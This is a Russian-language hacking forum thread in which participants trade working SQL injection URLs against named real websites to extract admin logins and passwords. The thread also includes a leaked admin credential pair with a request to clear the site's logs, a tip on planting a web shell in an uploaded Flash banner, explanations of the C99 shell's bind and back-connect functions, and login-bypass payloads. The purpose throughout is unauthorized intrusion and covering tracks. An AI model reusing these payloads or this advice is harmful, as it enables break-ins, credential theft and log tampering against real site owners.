Если баннер заливается (и не в БД) и с любым расширением - то можешь просто в конец флешки записать шелл в хекс-редакторе. Если расширение полюбому SWF, то те нужно именно флешку заливать с определённым кодом (ЭкшенСкрипт) редиректа - это максимум
http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/* http://www.a-shop.ru/admin sergey : q1w2e3 там есть менюшка с логами , вот как их отчистить?
Как можно безпалевно проверить днс сервер на эту http://www.securitylab.ru/vulnerability/355730.php дыру?
Помогите все знаю, но логин и пасс не могу выташить _http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat_ws(0x3a3a,column_name),5,6,7+from+information_schema.columns+where+table_name=char(112,111,108,108,95,117,115,101,114)-- _http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username, 0x3a,userpass),5,6,7+from+poll_user--
_nic Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно? Они следят за нами. Всегда! xD
Sindicat Я точно не смотрел, но кажется что надо пробить тебе на database(), а потом просто использовать конкатенацию +from+database_name.table_name И зачем чарить в конце? Захекси =) Честно-лень смотреть. Мог бы и не писать,скажете вы. Но не писать вообще лень =) Там же вообще выводится что либо? Принтабельные есть? Т.к. ошибка скачет постоянно... Без обид, я немного выпил "за сегодняшний удачный день!" =)
ThreeD абсолютно прав, мне было не лень ) http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,%200x3a,userpass),5,6,7+from+d8242sd5804.poll_user--
спасибо !!! мне все - ровно не понятно я вывел database() , получил d8242sd15320 - а у тебя получился d8242sd5804 почему так ?
Sindicat Видимо таблица poll_user относится к d8242sd5804 а не к d8242sd15320, иначе бы и конкатенацию использовать не пришлось. Не одна база просто, и ты сидишь не под нужной тебе. А используя d8242sd5804.poll_user, ты получаешь инфу из нужной тебе базы, которой является d8242sd5804, к которой и относится таблица poll_user. В базе d8242sd15320 таблицы poll_user нет. Юзай concat_ws(0x3A3a,table_schema,table_name)+from+information_schema.tables , чтобы узнать к какой базе относится нужная тебе таблица.
На сайте под управлением mssql access есть уязвимость в авторизации. пытаюсь скомбинировать как в mssql но не получается. Как правильно ввести данные?
Народ объясните что такое в шелле C99 в тулс..... Binding port Back connection Datapipe ЧТО ЭТО ВООБЩЕ ТАКОЕ??? если можно то каждую функцию отдельно объясните
Биндшелл, это когда открывается порт на машине.Binding port. Бэкконект рулит когда тачка за натом, к твоей тачке коннектит, а ты на свой врубаешь неткат и слушаешь порт, на который должен быть коннект. Хотя я могу ошибаться, но вроде таг =) *пошёл за пивом* ))))
Access не поддерживает комментарии вот это "--" не катит, прочитай наконец статью https://forum.antichat.net/threadnav50550-1-10.html
diznt ЭЭЭ. Ёпта, там датапайп исчо... Вроде он перебрасывает tcp/ip пакеты на другой хост, любой. Для анонимности типа.
Это так теория, в твоём случае она не применима, но знать будет полезно (для других БД, к примеру мускул). Это зависит только от запроса, т.е. найти вариант, который прокатывал бы в каждой админке с уязвимой авторизацией не реал. 1. "--" будет служить символом комментария только если после этого чуда идёт пробел, а в админках часто используется обрезание пробельных символов по краям, так что лучше юзать так: "-- 1". 2. Пробывать лучше это: login' or 1=1-- 1 password' or 1=1-- 1 3. Часто бывает что без извращений с юнионом в админку по скуле в авторизации не попасть, но тут не видя сорца скрипта сделать что либо почти не реал. Хотя в крации расскажу: Если авторизации (т.е. проверка правильности введённой инфы) проходит только по результату запроса, то прокатывает посдановка вышеуказанной комбинации. А бывает, что из запроса (по логину) достается соотвествующий пароль или хеш пароля, а уже затем он сравнивается с введённым тобою, что то вроде этого: Code: select password from admin where login = '$login'; В таких случаях нужно через объединение запросов впихивать левые данные: Code: логин = 1' and 1=2 union select 'pass'-- 1 И пароль соответственно = pass Ну или есть хеширование: Code: логин = 1' and 1=2 union select md5('pass')-- 1 И пароль соответственно = pass Но это так теория, на практике это будет геморно осуществить. 4. Ещё как вариант попробовать раскрутить инъекцию как слепую - тоже частенько удаётся сделать.
В данном случае ты имеешь ввиду посимвольный перебор с использованием подзапросов? Я не сталкивался ни разу с подобным извращением в авторизации. Можно конкретнее (примерчик например )).